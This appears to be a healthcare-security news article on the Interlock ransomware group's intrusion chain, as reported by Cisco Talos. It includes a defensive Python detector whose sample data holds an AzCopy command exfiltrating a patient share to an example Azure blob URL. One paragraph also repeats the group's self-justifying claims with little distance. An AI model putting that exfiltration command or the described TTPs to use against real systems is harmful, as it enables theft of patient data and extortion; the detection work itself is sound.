US Healthcare Organizations Targeted by New Interlock Ransomware Group

Cisco Talos Incident Response reported that a new ransomware group, active since September 2024, has been targeting the healthcare sector. Interlock ransomware is a threat group that claims to conduct its attacks both for financial gain and to expose healthcare institutions' poor security practices. Based on the attacks seen in its first few months, Interlock has targeted large organizations with the financial capacity to pay sizeable ransoms.

Interlock states that the group exposes organizations' irresponsibility in failing to safeguard their most important assets: customer information and intellectual property. They take advantage of the vulnerabilities that organizations leave unsecured, sending a tough but needed wake-up call to those who skimp on security. Interlock stated on its data leak blog that it is not only after money; it wants accountability. Information remains safe if people work hard to protect it. The group says it wants to enforce requirements, such as HIPAA compliance, that organizations fail to maintain.

The Cisco Talos IR team's analysis of one Interlock ransomware attack revealed a number of the group's tactics, techniques, and procedures (TTPs). Although the group claims to exploit vulnerabilities, in this case it gained initial access by tricking a user into installing a fake Google Chrome browser update served from a compromised legitimate news website. The executable dropped a remote access tool (RAT), which placed a Windows shortcut (.lnk) file in the user's Startup folder so that the RAT ran every time the user logged in.

The RAT collects system information, encrypts it, connects to the Interlock command and control (C2) server, and sends the encrypted data to it. The RAT also dropped a credential stealer and a keylogger, disabled the endpoint detection and response (EDR) software, and attempted to clear the Windows event logs to evade detection.

For lateral movement, Interlock mainly used the Remote Desktop Protocol (RDP) with the stolen credentials, and also used the remote access tools LogMeIn and AnyDesk for remote connectivity. PuTTY was installed to allow lateral movement to Linux hosts. Data was exfiltrated to a remote Azure storage account using AzCopy, and only then was the ransomware deployed to encrypt files. Interlock took 17 days from initial compromise to file encryption, and the ransom note demanded a response within 96 hours.
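The TTP chain described above (Startup-folder .lnk persistence, event-log clearing, LogMeIn/AnyDesk/PuTTY use, RDP-based lateral movement and AzCopy exfiltration to Azure storage) is the kind of sequence a SOC can look for in endpoint telemetry. The following detector is an added example written for this article; it is not code from Cisco Talos, from Interlock's tooling, or from the original report. The event field names, the event IDs it keys on (Sysmon 1 and 11, Security 1102 and 4624), the RDP fan-out threshold and the sample events are all assumptions constructed for illustration.

```python
"""
Added detection example (not Cisco Talos' or this article's code): scans a stream of
simplified Windows/Sysmon-style events for the Interlock-style TTP chain, namely
Startup-folder .lnk persistence, Security log clearing, remote-access-tool launches,
RDP fan-out from a single account, and AzCopy uploads to Azure blob storage.
Field names, event IDs and the sample events below are constructed assumptions.
"""
import re
from collections import defaultdict

# Assumed event IDs: Sysmon 1 = ProcessCreate, Sysmon 11 = FileCreate,
# Security 1102 = audit log cleared, Security 4624 = logon (LogonType 10 = RDP).
STARTUP_LNK = re.compile(
    r"\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\[^\\]+\.lnk$", re.IGNORECASE)
AZURE_BLOB_URL = re.compile(r"https://[a-z0-9]+\.blob\.core\.windows\.net/", re.IGNORECASE)
REMOTE_ACCESS_TOOLS = {"anydesk.exe", "logmein.exe", "putty.exe"}
RDP_FANOUT_THRESHOLD = 3  # assumption: one account reaching >= 3 hosts over RDP is suspicious


def _image_name(path):
    """Return the lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return a list of (technique, subject, detail) tuples found in the event stream."""
    findings = []
    rdp_hosts_by_user = defaultdict(set)
    for ev in events:
        eid = ev.get("EventID")
        if eid == 11 and STARTUP_LNK.search(ev.get("TargetFilename", "")):
            # Persistence: a shortcut dropped into a per-user Startup folder.
            findings.append(("persistence_startup_lnk", ev["Computer"], ev["TargetFilename"]))
        elif eid == 1102:
            # Defense evasion: the Security log was cleared; 1102 itself survives the wipe.
            findings.append(("defense_evasion_log_cleared", ev["Computer"], ev.get("SubjectUserName")))
        elif eid == 1:
            image = _image_name(ev.get("Image", ""))
            cmdline = ev.get("CommandLine", "")
            if image == "azcopy.exe" and AZURE_BLOB_URL.search(cmdline):
                # Exfiltration: AzCopy pushing data to an external storage account.
                findings.append(("exfiltration_azcopy", ev["Computer"], cmdline))
            elif image in REMOTE_ACCESS_TOOLS:
                findings.append(("remote_access_tool", ev["Computer"], image))
        elif eid == 4624 and ev.get("LogonType") == 10:
            rdp_hosts_by_user[ev.get("TargetUserName")].add(ev["Computer"])
    # Lateral movement: one account fanning out over RDP to many hosts.
    for user, hosts in rdp_hosts_by_user.items():
        if len(hosts) >= RDP_FANOUT_THRESHOLD:
            findings.append(("lateral_movement_rdp_fanout", user, sorted(hosts)))
    return findings


def technique_tags(findings):
    """Distinct technique names, sorted, for a quick summary of what fired."""
    return sorted({f[0] for f in findings})


# Constructed sample telemetry (not real logs) modelled on the intrusion narrative.
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS01", "Image": r"C:\Users\jdoe\Downloads\ChromeUpdate.exe",
     "CommandLine": "ChromeUpdate.exe"},
    {"EventID": 11, "Computer": "WS01",
     "TargetFilename": r"C:\Users\jdoe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"EventID": 1102, "Computer": "WS01", "SubjectUserName": "jdoe"},
    {"EventID": 1, "Computer": "WS01", "Image": r"C:\Users\jdoe\AppData\Local\AnyDesk\anydesk.exe",
     "CommandLine": "anydesk.exe"},
    {"EventID": 4624, "Computer": "SRV01", "TargetUserName": "svc_backup", "LogonType": 10},
    {"EventID": 4624, "Computer": "SRV02", "TargetUserName": "svc_backup", "LogonType": 10},
    {"EventID": 4624, "Computer": "SRV03", "TargetUserName": "svc_backup", "LogonType": 10},
    {"EventID": 4624, "Computer": "SRV03", "TargetUserName": "jdoe", "LogonType": 2},
    {"EventID": 1, "Computer": "SRV02", "Image": r"C:\Tools\azcopy.exe",
     "CommandLine": 'azcopy.exe copy "D:\\Shares\\Patients" '
                    '"https://exampleacct.blob.core.windows.net/stage?sv=2022-11-02&sig=REDACTED" --recursive'},
    {"EventID": 1, "Computer": "SRV02", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Run as a script it prints the five findings the sample stream contains. In a real deployment the same checks would be expressed as SIEM rules; the point of the script is that each stage Talos describes leaves a distinct artefact, and that the AzCopy-to-Azure upload fires before encryption starts, which is the window in which the intrusion can still be contained.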

To date, victims have included U.S. healthcare providers, technology companies, and government organizations, with development companies attacked in Europe. Stolen data is posted on Interlock's "Worldwide Secrets" leak blog if no ransom is paid. Cisco Talos assesses that Interlock may be a splinter group from the Rhysida ransomware operation because of overlapping TTPs, but presents this as an assessment rather than a confirmed link.

Image credits: Andrey Popov, AdobeStock


Posted by

John Blacksmith

John Blacksmith is a journalist with several years' experience in both print and online publications. John has specialised in information technology in the healthcare sector, and in particular in healthcare data security and privacy. His focus on healthcare data means he has specialist knowledge of the HIPAA regulations. John has a degree in journalism.